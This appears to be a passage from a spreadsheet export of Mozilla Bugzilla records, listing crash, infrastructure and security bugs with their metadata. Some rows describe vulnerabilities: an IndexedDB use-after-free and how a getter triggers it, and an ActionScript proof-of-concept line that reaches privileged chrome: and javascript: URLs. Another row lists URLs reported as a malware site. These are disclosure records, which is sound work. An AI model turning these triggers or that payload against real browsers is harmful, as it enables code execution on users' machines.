          <t>2010-04-08 06:23:48 -0700</t>
        </is>
      </c>
      <c r="C4729" t="inlineStr">
        <is>
          <t>FixedAlloc doesn't handle kCanFail properly in builds with hooks enabled</t>
        </is>
      </c>
      <c r="D4729" t="inlineStr">
        <is>
          <t>2010-05-18 03:31:50 -0700</t>
        </is>
      </c>
      <c r="E4729" t="n">
        <v>1</v>
      </c>
      <c r="F4729" t="n">
        <v>1</v>
      </c>
      <c r="G4729" t="n">
        <v>6</v>
      </c>
      <c r="H4729" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4729" t="inlineStr">
        <is>
          <t>Tamarin Graveyard</t>
        </is>
      </c>
      <c r="J4729" t="inlineStr">
        <is>
          <t>Garbage Collection (mmGC)</t>
        </is>
      </c>
      <c r="K4729" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4729" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4729" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4729" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4729" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4729" t="inlineStr"/>
      <c r="Q4729" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4729" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4729" t="inlineStr">
        <is>
          <t>flash10.1</t>
        </is>
      </c>
      <c r="T4729" t="n">
        <v>1</v>
      </c>
      <c r="U4729" t="n">
        <v>0</v>
      </c>
      <c r="V4729" t="n">
        <v>16</v>
      </c>
      <c r="W4729" t="inlineStr">
        <is>
          <t>Need to NULL check return value from InlineAllocSansHook when opts contains kCanFail.</t>
        </is>
      </c>
      <c r="X4729" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4730">
      <c r="A4730" t="n">
        <v>585068</v>
      </c>
      <c r="B4730" t="inlineStr">
        <is>
          <t>2010-08-06 08:35:34 -0700</t>
        </is>
      </c>
      <c r="C4730" t="inlineStr">
        <is>
          <t>Update Technology Matrix</t>
        </is>
      </c>
      <c r="D4730" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E4730" t="n">
        <v>1</v>
      </c>
      <c r="F4730" t="n">
        <v>1</v>
      </c>
      <c r="G4730" t="n">
        <v>5</v>
      </c>
      <c r="H4730" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4730" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J4730" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4730" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4730" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4730" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4730" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4730" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4730" t="inlineStr"/>
      <c r="Q4730" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4730" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4730" t="inlineStr">
        <is>
          <t>4.0</t>
        </is>
      </c>
      <c r="T4730" t="n">
        <v>1</v>
      </c>
      <c r="U4730" t="n">
        <v>0</v>
      </c>
      <c r="V4730" t="n">
        <v>11</v>
      </c>
      <c r="W4730" t="inlineStr">
        <is>
          <t>Can we please
add "Mutlitouch support (Windows 7)" to the Device integration section and check beta 4.</t>
        </is>
      </c>
      <c r="X4730" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4731">
      <c r="A4731" t="n">
        <v>706381</v>
      </c>
      <c r="B4731" t="inlineStr">
        <is>
          <t>2011-11-29 21:06:19 -0800</t>
        </is>
      </c>
      <c r="C4731" t="inlineStr">
        <is>
          <t>Java related crash with deleted pointer in esx</t>
        </is>
      </c>
      <c r="D4731" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E4731" t="n">
        <v>1</v>
      </c>
      <c r="F4731" t="n">
        <v>1</v>
      </c>
      <c r="G4731" t="n">
        <v>6</v>
      </c>
      <c r="H4731" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4731" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J4731" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K4731" t="inlineStr">
        <is>
          <t>9 Branch</t>
        </is>
      </c>
      <c r="L4731" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4731" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4731" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4731" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4731" t="inlineStr">
        <is>
          <t>[sg:critical][qa-]</t>
        </is>
      </c>
      <c r="Q4731" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4731" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4731" t="inlineStr">
        <is>
          <t>mozilla11</t>
        </is>
      </c>
      <c r="T4731" t="n">
        <v>1</v>
      </c>
      <c r="U4731" t="n">
        <v>0</v>
      </c>
      <c r="V4731" t="n">
        <v>25</v>
      </c>
      <c r="W4731" t="inlineStr">
        <is>
          <t>Created attachment 577852
crash report
0. enable Java(TM) Platform SE 6 U29
1. enable popups
2. disable malware detector
3. http://www.sheru100.in/view/index585.html
4. shutdown
http://cpm1.jmxy.com:899/cpm/tg_href.aspx?tg_d=www.ads80.com will be loaded which is reported as a malware attack site.
Nightly/11 Windows 7
bp-f1059123-a28f-499c-9003-5ed772111129
Crash Report [@ mozalloc_abort(char const* const) | NS_DebugBreak_P | mozilla::plugins::PluginModuleChild::ShouldContinueFromReplyTimeout() ] 
See also bug 681385
Automation hit this with ecx pointing to deleted memory. I wasn't able to reproduce locally though.
Operating system: Windows NT
                  6.1.7601 Service Pack 1
CPU: x86
     GenuineIntel family 6 model 44 stepping 2
     2 CPUs
Crash reason:  EXCEPTION_ACCESS_VIOLATION_WRITE
Crash address: 0xffffffffddddde1d
Thread 0 (crashed)
 0  xul.dll!nsNPAPIPluginInstance::InvalidateOwner() [nsNPAPIPluginInstance.cpp : 1431 + 0x3]
    eip = 0x6f9ed2ea   esp = 0x0031b128   ebp = 0x0031b12c   ebx = 0x00000001
    esi = 0x04ae00e8   edi = 0xffffff87   eax = 0xdddddddd   ecx = 0xdddddddd
    edx = 0x00000001   efl = 0x00210246
    Found by: given as instruction pointer in context
 1  xul.dll!nsDummyJavaPluginOwner::Destroy() [nsGlobalWindow.cpp : 483 + 0x11]
    eip = 0x6f28450a   esp = 0x0031b134   ebp = 0x0031b138
    Found by: call frame info
 2  xul.dll!nsGlobalWindow::FreeInnerObjects(int) [nsGlobalWindow.cpp : 1311 + 0x14]
    eip = 0x6f2874ff   esp = 0x0031b140   ebp = 0x0031b168
    Found by: call frame info
 3  xul.dll!nsGlobalWindow::SetDocShell(nsIDocShell *) [nsGlobalWindow.cpp : 2397 + 0x10]
    eip = 0x6f28bde4   esp = 0x0031b170   ebp = 0x0031b1c8
    Found by: call frame info
 4  xul.dll!nsDocShell::Destroy() [nsDocShell.cpp : 4611 + 0x1c]
    eip = 0x6f82852a   esp = 0x0031b1d0   ebp = 0x0031b22c
    Found by: call frame info
 5  xul.dll!nsFrameLoader::Finalize() [nsFrameLoader.cpp : 573 + 0x18]
    eip = 0x6efbc3a1   esp = 0x0031b234   ebp = 0x0031b248
    Found by: call frame info</t>
        </is>
      </c>
      <c r="X4731" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4732">
      <c r="A4732" t="n">
        <v>1467523</v>
      </c>
      <c r="B4732" t="inlineStr">
        <is>
          <t>2018-06-07 11:01:20 -0700</t>
        </is>
      </c>
      <c r="C4732" t="inlineStr">
        <is>
          <t>"Domain fronting" by rewriting Host header with webRequest</t>
        </is>
      </c>
      <c r="D4732" t="inlineStr">
        <is>
          <t>2020-02-16 17:40:36 -0800</t>
        </is>
      </c>
      <c r="E4732" t="n">
        <v>1</v>
      </c>
      <c r="F4732" t="n">
        <v>1</v>
      </c>
      <c r="G4732" t="n">
        <v>3</v>
      </c>
      <c r="H4732" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4732" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J4732" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4732" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L4732" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4732" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4732" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4732" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4732" t="inlineStr">
        <is>
          <t>[adv-main63+][adv-esr60.3+]</t>
        </is>
      </c>
      <c r="Q4732" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4732" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4732" t="inlineStr">
        <is>
          <t>mozilla64</t>
        </is>
      </c>
      <c r="T4732" t="n">
        <v>1</v>
      </c>
      <c r="U4732" t="n">
        <v>0</v>
      </c>
      <c r="V4732" t="n">
        <v>46</v>
      </c>
      <c r="W4732" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1465094 +++
See https://bugzilla.mozilla.org/show_bug.cgi?id=1465094#c1</t>
        </is>
      </c>
      <c r="X4732" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4733">
      <c r="A4733" t="n">
        <v>1415644</v>
      </c>
      <c r="B4733" t="inlineStr">
        <is>
          <t>2017-11-08 10:54:52 -0800</t>
        </is>
      </c>
      <c r="C4733" t="inlineStr">
        <is>
          <t>Should extensions get access to accounts.firefox.com</t>
        </is>
      </c>
      <c r="D4733" t="inlineStr">
        <is>
          <t>2022-07-07 11:30:34 -0700</t>
        </is>
      </c>
      <c r="E4733" t="n">
        <v>1</v>
      </c>
      <c r="F4733" t="n">
        <v>1</v>
      </c>
      <c r="G4733" t="n">
        <v>3</v>
      </c>
      <c r="H4733" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4733" t="inlineStr">
        <is>
          <t>WebExtensions</t>
        </is>
      </c>
      <c r="J4733" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4733" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4733" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4733" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4733" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4733" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4733" t="inlineStr">
        <is>
          <t>[adv-main60+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4733" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4733" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4733" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T4733" t="n">
        <v>1</v>
      </c>
      <c r="U4733" t="n">
        <v>0</v>
      </c>
      <c r="V4733" t="n">
        <v>69</v>
      </c>
      <c r="W4733" t="inlineStr">
        <is>
          <t>Currently WebExtensions can attach content scripts to accounts.firefox.com and listen to traffic using the webRequest API. That means an extension could intercept your user name and password for that site.
If an extension did that, then the argument is that then the extension would have access to all the data stored in the sync backend. That might be your complete browsing history, for example.
To do this an extension needs to ask for permission to accounts.firefox.com specifically, or &lt;all_urls&gt;. We are potentially asking the user to make the leap that access to &lt;all_urls&gt; might mean "all my browsing history" I've synced.
The developer could get access to this by asking for the history API, for example, but that warns the user (hopefully clearly) that they've asked for this.
This assumes that getting access to accounts.firefox.com means that a malicious extension can get access to the browsing history... so cc'ing rkelly for that. Pinging jkt for the security view of this.</t>
        </is>
      </c>
      <c r="X4733" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4734">
      <c r="A4734" t="n">
        <v>1538956</v>
      </c>
      <c r="B4734" t="inlineStr">
        <is>
          <t>2019-03-25 13:47:51 -0700</t>
        </is>
      </c>
      <c r="C4734" t="inlineStr">
        <is>
          <t>Investigate discrepancies in Security Risk Report</t>
        </is>
      </c>
      <c r="D4734" t="inlineStr">
        <is>
          <t>2019-03-28 07:25:35 -0700</t>
        </is>
      </c>
      <c r="E4734" t="n">
        <v>1</v>
      </c>
      <c r="F4734" t="n">
        <v>1</v>
      </c>
      <c r="G4734" t="n">
        <v>7</v>
      </c>
      <c r="H4734" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4734" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J4734" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4734" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L4734" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4734" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4734" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4734" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4734" t="inlineStr"/>
      <c r="Q4734" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4734" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4734" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4734" t="n">
        <v>1</v>
      </c>
      <c r="U4734" t="n">
        <v>0</v>
      </c>
      <c r="V4734" t="n">
        <v>2</v>
      </c>
      <c r="W4734" t="inlineStr">
        <is>
          <t>Israel will investigate the discrepancies reported by Dan and others. Time-boxed to be done by Wednesday.</t>
        </is>
      </c>
      <c r="X4734" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4735">
      <c r="A4735" t="n">
        <v>1459383</v>
      </c>
      <c r="B4735" t="inlineStr">
        <is>
          <t>2018-05-04 22:57:21 -0700</t>
        </is>
      </c>
      <c r="C4735" t="inlineStr">
        <is>
          <t>Use After Free in indexedDB</t>
        </is>
      </c>
      <c r="D4735" t="inlineStr">
        <is>
          <t>2024-05-30 09:45:53 -0700</t>
        </is>
      </c>
      <c r="E4735" t="n">
        <v>1</v>
      </c>
      <c r="F4735" t="n">
        <v>1</v>
      </c>
      <c r="G4735" t="n">
        <v>3</v>
      </c>
      <c r="H4735" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4735" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4735" t="inlineStr">
        <is>
          <t>Storage: IndexedDB</t>
        </is>
      </c>
      <c r="K4735" t="inlineStr">
        <is>
          <t>59 Branch</t>
        </is>
      </c>
      <c r="L4735" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4735" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4735" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4735" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4735" t="inlineStr">
        <is>
          <t>[fixed on trunk in bug 1404274][post-critsmash-triage][adv-main62+][adv-esr60.2+]</t>
        </is>
      </c>
      <c r="Q4735" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4735" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4735" t="inlineStr">
        <is>
          <t>mozilla63</t>
        </is>
      </c>
      <c r="T4735" t="n">
        <v>1</v>
      </c>
      <c r="U4735" t="n">
        <v>0</v>
      </c>
      <c r="V4735" t="n">
        <v>28</v>
      </c>
      <c r="W4735" t="inlineStr">
        <is>
          <t>Created attachment 8973400
FireFox_IndexDB_UAF.html
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Steps to reproduce:
run firefox with attached html
Actual results:
https://searchfox.org/mozilla-central/source/dom/indexedDB/KeyPath.cpp#323
nsresult
KeyPath::ExtractKey(JSContext* aCx, const JS::Value&amp; aValue, Key&amp; aKey) const
{
  uint32_t len = mStrings.Length();
  JS::Rooted&lt;JS::Value&gt; value(aCx);
  aKey.Unset();
  for (uint32_t i = 0; i &lt; len; ++i) {
    nsresult rv = GetJSValFromKeyPathString(aCx, aValue, mStrings[i],
                                            value.address(),
                                            DoNotCreateProperties, nullptr,
                                            nullptr);
    if (NS_FAILED(rv)) {
      return rv;
    }
    if (NS_FAILED(aKey.AppendItem(aCx, IsArray() &amp;&amp; i == 0, value))) {
      NS_ASSERTION(aKey.IsUnset(), "Encoding error should unset");
      return NS_ERROR_DOM_INDEXEDDB_DATA_ERR;
    }
  }
  aKey.FinishArray();
  return NS_OK;
}
GetJSValFromKeyPathString can execute js callback by setting a getter. In the callback, one can call deleteIndex free the KeyPath now using, which make mStrings invalid.</t>
        </is>
      </c>
      <c r="X4735" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4736">
      <c r="A4736" t="n">
        <v>1590519</v>
      </c>
      <c r="B4736" t="inlineStr">
        <is>
          <t>2019-10-22 12:12:25 -0700</t>
        </is>
      </c>
      <c r="C4736" t="inlineStr">
        <is>
          <t>socorro deploy: 2019.10.22</t>
        </is>
      </c>
      <c r="D4736" t="inlineStr">
        <is>
          <t>2019-11-12 13:09:58 -0800</t>
        </is>
      </c>
      <c r="E4736" t="n">
        <v>1</v>
      </c>
      <c r="F4736" t="n">
        <v>1</v>
      </c>
      <c r="G4736" t="n">
        <v>4</v>
      </c>
      <c r="H4736" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4736" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4736" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K4736" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4736" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4736" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4736" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4736" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4736" t="inlineStr"/>
      <c r="Q4736" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4736" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4736" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4736" t="n">
        <v>1</v>
      </c>
      <c r="U4736" t="n">
        <v>0</v>
      </c>
      <c r="V4736" t="n">
        <v>3</v>
      </c>
      <c r="W4736" t="inlineStr">
        <is>
          <t>We want to do a deploy for `socorro` tagged `2019.10.22`.
It consists of the following:
`6102040`: bug 1589604: add gsignal and friends to prefix list (willkg)
`51e0d02`: bug 1590096: add more libc functions to prefix list (willkg)
`752107b`: bug 1590194: add mozilla::MozPromise&lt;T&gt;::ThenInternal to prefix list (willkg)
`b24b5f9`: Update Fennec versions for new releases going out today (rvandermeulen)</t>
        </is>
      </c>
      <c r="X4736" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4737">
      <c r="A4737" t="n">
        <v>1505388</v>
      </c>
      <c r="B4737" t="inlineStr">
        <is>
          <t>2018-11-07 06:25:07 -0800</t>
        </is>
      </c>
      <c r="C4737" t="inlineStr">
        <is>
          <t>Crash in mozilla::net::SpdyConnectTransaction::WriteSegments</t>
        </is>
      </c>
      <c r="D4737" t="inlineStr">
        <is>
          <t>2018-11-19 12:16:36 -0800</t>
        </is>
      </c>
      <c r="E4737" t="n">
        <v>1</v>
      </c>
      <c r="F4737" t="n">
        <v>1</v>
      </c>
      <c r="G4737" t="n">
        <v>3</v>
      </c>
      <c r="H4737" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4737" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4737" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K4737" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4737" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4737" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4737" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4737" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4737" t="inlineStr">
        <is>
          <t>[necko-triaged]</t>
        </is>
      </c>
      <c r="Q4737" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4737" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4737" t="inlineStr">
        <is>
          <t>mozilla65</t>
        </is>
      </c>
      <c r="T4737" t="n">
        <v>1</v>
      </c>
      <c r="U4737" t="n">
        <v>0</v>
      </c>
      <c r="V4737" t="n">
        <v>6</v>
      </c>
      <c r="W4737" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is
report bp-f4294b26-32e6-47d6-8411-f26a90181107.
=============================================================
Seen while looking at nightly crash data: . Crashes started using Build ID 	20181107100135. Possible regression range based on Build ID: https://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=957a743c4ca2907d8e357fce43fbcd9f619f1122&amp;tochange=070757a0160c8e6156cf6d8d567a0af280dc33e8
Bug 1434137? ni on Nicholas.
Top 10 frames of crashing thread:
0 xul.dll mozilla::net::SpdyConnectTransaction::WriteSegments netwerk/protocol/http/TunnelUtils.cpp:1385
1 xul.dll mozilla::net::Http2Stream::WriteSegments netwerk/protocol/http/Http2Stream.cpp:319
2 xul.dll mozilla::net::Http2Session::WriteSegmentsAgain netwerk/protocol/http/Http2Session.cpp:3387
3 xul.dll mozilla::net::nsHttpConnection::OnInputStreamReady netwerk/protocol/http/nsHttpConnection.cpp:2422
4 xul.dll void mozilla::net::nsSocketInputStream::OnSocketReady netwerk/base/nsSocketTransport2.cpp:293
5 xul.dll mozilla::net::nsSocketTransport::OnSocketReady netwerk/base/nsSocketTransport2.cpp:2317
6 xul.dll mozilla::net::nsSocketTransportService::Run netwerk/base/nsSocketTransportService2.cpp:1040
7 xul.dll nsThread::ProcessNextEvent xpcom/threads/nsThread.cpp:1246
8 xul.dll NS_ProcessNextEvent xpcom/threads/nsThreadUtils.cpp:530
9 xul.dll mozilla::ipc::MessagePumpForNonMainThreads::Run ipc/glue/MessagePump.cpp:364
=============================================================</t>
        </is>
      </c>
      <c r="X4737" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4738">
      <c r="A4738" t="n">
        <v>298255</v>
      </c>
      <c r="B4738" t="inlineStr">
        <is>
          <t>2005-06-20 09:36:02 -0700</t>
        </is>
      </c>
      <c r="C4738" t="inlineStr">
        <is>
          <t>Stand-alone applications can run arbitrary code through Firefox</t>
        </is>
      </c>
      <c r="D4738" t="inlineStr">
        <is>
          <t>2007-04-01 15:10:30 -0700</t>
        </is>
      </c>
      <c r="E4738" t="n">
        <v>1</v>
      </c>
      <c r="F4738" t="n">
        <v>1</v>
      </c>
      <c r="G4738" t="n">
        <v>3</v>
      </c>
      <c r="H4738" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4738" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4738" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K4738" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4738" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4738" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4738" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4738" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4738" t="inlineStr">
        <is>
          <t>[sg:fix] Bug details embargoed until August 1, 2005</t>
        </is>
      </c>
      <c r="Q4738" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4738" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4738" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4738" t="n">
        <v>1</v>
      </c>
      <c r="U4738" t="n">
        <v>0</v>
      </c>
      <c r="V4738" t="n">
        <v>29</v>
      </c>
      <c r="W4738" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Most media types that can be viewed in Firefox using an embedded plugin, can
also be viewed in a stand-alone application. This applies to the most common
audio/video media types like ram/rpm/wmv/mov/avi, document formats like pdf and
multimedia formats like swf (flash). 
The stand-alone programms can (as every other desktop application) open URLs in
Firefox, usually be passing the URL to the operation system and invoking the
standard browser. The URL calls are (unlike when embedded) not checked at all. A
stand-alone mediaplayer can open chrome: and javascript: urls.
While this is expected behavior, it turns into a security risk when looking at
the fact, that it is easy to force that a media file gets opened in the stand
alone programm instead of embedding it. Usually it is enough to set
Content-Disposition header to type "attachement". This will result in a file
download dialog which most people will accept, since many websites use this as a
valid feature (e.g. for pdf downloads). Some video players (e.g. Quicktime)
support dedicated formats to force that a video gets played in the stand-alone
player - mostly due the fact that only the stand-alone quicktime player supports
real fullscreen playback. 
The problem is, that many media container formats (e.g. smil) and most
multimedia formats (e.g. swf) allow to automaticly open URLs by several
scripting languages or other mechanisms. That means scripting commands coming
from an untrusted source can automaticly invoke a desktop programm and then
re-invoke Firefox to run arbitrary code by opening a chrome: url and then a
javascript: url (to get universal xpconnect). 
One could argue, that this is a problem of the media players, but the media
players are (usually) secure in handling the various containers formats - they
just assume it is safe to throw urls of any kind at the default operation system
webbrowser. And in case of Firefox, it's not.
To proof this theory, i looked at the various file formats and players. I found
a reproducable way in the handling of stand-alone flash (swf) files. The
following peace of action script could be used to run arbitrary code from an swf
file in a stand alone player:
SWFAction("a=this.geturl('chrome://browser/content/browser.xul');b=this.geturl('javascript:alert(document.location);');"));
There are some timing issues with this demo (when the xul page loads too slow)
you usally have to try 2-3 times and re-start the browser after each try. I am
not so good in flash, there are probably ways to make that more stable. The good
news is, that flash does not ship with a stand-alone player by default, it only
comes with the flash development environment or from third partys. Anyway, bad
news is that it proofs the theory.
Another proven way to open a chrome url is the quicktime player (using &lt;a href&gt;
in a smil file) - and since the number of ways to manually and automaticly open
URLs from media formats are literally endless (real, windows media, quicktime
all support multiple ways of 'in-stream' url encodings, smil supports timed
hyperlink events, acrobat reader supports javascript, etc) i strongly believe
that there are many more ways.
Is there any valid use for desktop applications invoking a chrome file and/or
opening a javascript url in the context of another website? Shouldn't it be safe
to throw URLs at Firefox in any order - especially when considering that many
third party developers don't know about privileged xul? 
Reproducible: Always</t>
        </is>
      </c>
      <c r="X4738" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4739">
      <c r="A4739" t="n">
        <v>1212328</v>
      </c>
      <c r="B4739" t="inlineStr">
        <is>
          <t>2015-10-07 06:44:23 -0700</t>
        </is>
      </c>
      <c r="C4739" t="inlineStr">
        <is>
          <t>Crash [@ js::PrintError] with heap-buffer-overflow involving evalInWorker</t>
        </is>
      </c>
      <c r="D4739" t="inlineStr">
        <is>
          <t>2016-12-01 13:38:25 -0800</t>
        </is>
      </c>
      <c r="E4739" t="n">
        <v>1</v>
      </c>
      <c r="F4739" t="n">
        <v>1</v>
      </c>
      <c r="G4739" t="n">
        <v>3</v>
      </c>
      <c r="H4739" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4739" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4739" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4739" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4739" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4739" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4739" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4739" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4739" t="inlineStr">
        <is>
          <t>[jsbugmon:][adv-main46+][adv-esr45.1+]</t>
        </is>
      </c>
